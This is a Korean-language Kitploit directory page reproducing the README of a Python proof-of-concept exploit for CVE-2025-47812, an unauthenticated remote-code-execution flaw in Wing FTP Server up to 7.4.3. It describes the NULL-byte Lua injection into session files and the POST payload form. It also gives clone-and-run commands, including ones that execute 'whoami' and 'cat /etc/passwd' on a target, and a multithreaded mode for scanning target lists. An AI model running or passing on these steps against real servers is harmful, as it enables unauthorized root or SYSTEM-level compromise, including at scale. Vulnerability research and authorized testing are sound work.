Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-471812-POC — CVE-2025-47812에 대한 Python PoC, Wing FTP Server <= 7.4.3에서 세션 파일에 NULL 바이트 Lua 주입을 통한 인증되지 않은 RCE | Kitploit
도구/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

CVE-2025-47812에 대한 Python PoC, Wing FTP Server <= 7.4.3에서 세션 파일에 NULL 바이트 Lua 주입을 통한 인증되지 않은 RCE

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
root@kitploit:~
     ____  _______   ___   __ ____  __  ___ ____
    / __ \|__  /  | / / | / / __ \/  |/  // _/
   / / / / /_ <| | / /| |/ / / / / /|_/ / / /
  / / /_/___/ /| |/ / |   / /_/ / /  / /_/ /
 /_____/____/ |___/  |_/  \____/_/  /_/____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 인증 없이 원격 코드 실행

CVE-2025-47812에 대한 개념 증명 익스플로잇입니다. Wing FTP Server 7.4.4 이전 버전에서 인증 없이 원격 코드 실행이 가능한 취약점입니다.

취약점 개요

항목내용
CVECVE-2025-47812
영향받는 버전Wing FTP Server <= 7.4.3
유형인증 없이 원격 코드 실행
권한root (Linux) / SYSTEM (Windows)
공급업체wftpserver.com
원저자Sheikh Mohammad Hasan aka 4m3rr0r
수정자d3vn0mi

근본 원인

Wing FTP Server의 c_CheckUser() 함수는 인증을 위해 NULL 바이트(%00)에서 사용자 이름을 자르지만 완전히 검증되지 않은 사용자 이름 — NULL 바이트 이후의 모든 내용 — 이 Lua 세션 파일에 기록됩니다. /dir.html과 같은 인증된 엔드포인트에 접근하면 서버가 해당 세션 파일을 실행하여 주입된 Lua 코드가 상승된 권한으로 트리거됩니다.

공격 흐름

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. 서버는 "anonymous"를 인증하지만(NULL에서 잘림)
   전체 페이로드가 세션 파일에 기록됨 → UID 쿠키 반환

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   서버가 세션 파일 로드 → 주입된 Lua 실행 → RCE

설치

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

사용법

빠른 취약점 확인

root@kitploit:~
python3 exploit.py -u http://TARGET

명령어 실행

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

파일에서 여러 대상 스캔

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

전체 옵션

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           단일 대상 URL (예: http://192.168.134.130)
  -f, --file FILE         대상 URL이 포함된 파일 (한 줄에 하나, # 주석 허용)

exploit options:
  -c, --command COMMAND   원격 서버에서 실행할 명령어 (상세 출력 활성화)
  -U, --username USERNAME 익스플로잇 페이로드의 사용자 이름 (기본값: anonymous)
  -P, --password PASSWORD 익스플로잇 페이로드의 비밀번호 (기본값: 빈 문자열)

output:
  -v, --verbose           상세/디버그 로깅 활성화
  -o, --output OUTPUT     취약한 URL을 이 파일에 저장
  -l, --log-file LOG_FILE 상세 로그를 이 파일에 기록

network:
  -t, --threads THREADS   다중 대상 스캔 시 동시 스레드 수 (기본값: 1)
  --timeout TIMEOUT       HTTP 요청 타임아웃 (초 단위, 기본값: 15)
  --retries RETRIES       연결 실패 시 재시도 횟수 (기본값: 2)
  --no-verify             SSL 인증서 검증 비활성화

예제

root@kitploit:~
# 단일 대상 확인
python3 exploit.py -u http://192.168.1.10

# 'whoami' 실행 및 전체 출력 확인
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# 8개 스레드로 목록 스캔, 모든 내용을 파일에 기록
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# SSL 검증 비활성화하고 사용자 지정 자격 증명 사용
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# 디버깅을 위한 상세 모드
python3 exploit.py -u http://192.168.1.10 -v

기능

  • 구조화된 로깅 — 색상 코드 콘솔 출력 (DEBUG/INFO/WARN/ERROR) + --log-file을 통한 파일 로깅 옵션
  • 멀티스레드 스캐닝 — 대규모 대상 목록에 대해 -t로 병렬 스캔
  • 백오프 재시도 — 네트워크 실패 시 자동 지수 백오프 (설정 가능한 --retries)
  • SSL 유연성 — 자체 서명 인증서에 대한 --no-verify
  • 배치 스캐닝 — 대상 파일에서 # 주석 및 자동 중복 제거 지원
  • 깔끔한 출력 — 취약점 확인 모드는 간단히 VULNERABLE/NOT VULNERABLE 결과 제공; -c는 명령어 전체 출력 표시

면책 조항

이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다. 소유하고 있거나 명시적인 서면 허가를 받은 시스템에만 사용하십시오. 컴퓨터 시스템에 무단 접근하는 것은 불법입니다. 저자는 이 도구의 오용이나 피해에 대해 책임을 지지 않습니다.

크레딧

  • 원본 익스플로잇: 4m3rr0r
  • 수정 및 개선: d3vn0mi
도구 다운로드